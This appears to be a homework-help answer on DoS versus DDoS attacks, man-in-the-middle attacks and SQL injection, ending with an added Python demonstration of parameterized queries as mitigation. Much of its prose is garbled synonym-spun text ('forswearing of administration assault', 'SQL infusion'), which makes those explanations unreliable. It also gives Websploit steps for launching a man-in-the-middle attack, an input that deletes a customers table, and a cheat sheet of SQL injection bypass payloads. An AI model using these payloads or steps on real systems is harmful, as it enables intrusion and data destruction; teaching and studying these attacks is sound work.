Question

Explain the difference between Denial-of-Service and Distributed Denial-of-Service attacks. Why is the latter much more damaging?...

  1. Explain the difference between Denial-of-Service and Distributed Denial-of-Service attacks. Why is the latter much more damaging?
  2. What is a Man-in-the-Middle attack? Describe how one may be launched.
  3. Describe how a SQL injection attack works and ways to mitigate one.
Answer #1

Answer 1
************


A DoS assault is a forswearing of administration assault where a PC (or PCs) is utilized to flood a server with TCP and UDP bundles. Amid this kind of assault, the administration is put out of activity as the parcels sent over-burden the server's capacities and make the server inaccessible to different gadgets and clients all through the system. DoS assaults are utilized to close down individual machines and systems with the goal that they can't be utilized by different clients.

Attacks
*********
Buffer overflow attacks
Ping of Death or ICMP flood
SYN flood
Teardrop Attack

A DDoS assault is a standout amongst the most well-known kinds of DoS assault being used today. Amid a DoS assault, various frameworks focus on a solitary framework with a DoS assault. The focused on system is then besieged with parcels from numerous areas. By utilizing numerous areas to assault the framework the aggressor can put the framework disconnected all the more effectively. The explanation behind this is there is a bigger number of machines at the aggressors' transfer and it winds up troublesome for the unfortunate casualty to pinpoint the birthplace of the assault.

Attacks
*********
UDP Floods
Ping Flood
SYN Flood
Slowloris
HTTP Flood
Zero-Day Attacks

Answer 2
************

A man-in-the-center assault is completed by programmers to embed their quality in the middle of the correspondence of two gatherings to access all the data sent to and from both the gatherings. The programmer can prevent the clients from sending and getting information, or may even occupy and divert the messages to another client. The primary goal of a Man-in-the-Middle assault is to spy on the clients' discussion, concealing their essence, influencing it to show up so typical as though there is no third individual associated with the correspondence.

1) Install Websploit

2) Launch Websploit

3) Select the MitM Module
show modules
use network/mitm
4) Set the Options
5) Run the Attack!

Now if the target navigates to a website, we will see it appear in our console!

Answer 3
***********

SQL infusion is a web security powerlessness that enables an aggressor to meddle with the questions that an application makes to its database. It by and large enables an assailant to see information that they are not ordinarily ready to recover. This may incorporate information having a place with different clients, or whatever other information that the application itself can get to. As a rule, an assailant can adjust or erase this information, making determined changes to the application's substance or conduct.

The back-end database query might look something like this:

SELECT * FROM customers WHERE customer_id = '1234567'

Suppose a user entered the following customer_id in a web form field:

1234567'; DELETE FROM customers WHERE 'x' = 'x

The back-end database would then obediently execute the following SQL:

SELECT * FROM customers WHERE customer_id = '1234567';

DELETE FROM customers WHERE 'x' = 'x'

Databases will happily execute multiple SQL statements in a row if separated by a semicolon. Failure to sanitize the user input for the single quote "'" character makes it possible for an attacker to delete the entire table.

Cheatsheet
**************

injection
==========

' or '1'='1
' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '


' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

The above cheat sheet will work for SQL injection against a vulnerable database design.

Thanks
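
Question 3 also asks for ways to mitigate SQL injection. The following is an added example, not part of the original answer, that runs the customer_id lookup above both as a concatenated string and as a parameterized query. The in-memory SQLite table, its sample rows and the function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """Build an in-memory customers table with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (customer_id TEXT PRIMARY KEY, name TEXT)")
    db.executemany(
        "INSERT INTO customers VALUES (?, ?)",
        [("1234567", "Alice"), ("2345678", "Bob"), ("3456789", "Carol")],
    )
    db.commit()
    return db


def lookup_concatenated(db, customer_id):
    """Vulnerable pattern: the form value becomes part of the SQL text."""
    sql = "SELECT name FROM customers WHERE customer_id = '" + customer_id + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_parameterized(db, customer_id):
    """Mitigation: the driver binds the value, so it is never parsed as SQL."""
    sql = "SELECT name FROM customers WHERE customer_id = ?"
    return [row[0] for row in db.execute(sql, (customer_id,))]


def lookup_validated(db, customer_id):
    """Defense in depth: allow-list the expected format, then bind the value."""
    if not (customer_id.isascii() and customer_id.isdigit() and len(customer_id) <= 10):
        raise ValueError("customer_id must be 1 to 10 digits")
    return lookup_parameterized(db, customer_id)


if __name__ == "__main__":
    db = make_db()
    form_value = "' or '1'='1"  # first entry of the cheat sheet above
    # Concatenation turns the WHERE clause into a tautology: every row comes back.
    print("concatenated: ", lookup_concatenated(db, form_value))
    # Binding compares the whole string with customer_id: no row matches.
    print("parameterized:", lookup_parameterized(db, form_value))
    try:
        lookup_validated(db, form_value)
    except ValueError as exc:
        print("validated:     rejected,", exc)
```

Parameter binding is the primary fix; the format check only narrows what reaches the query and does not replace it.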
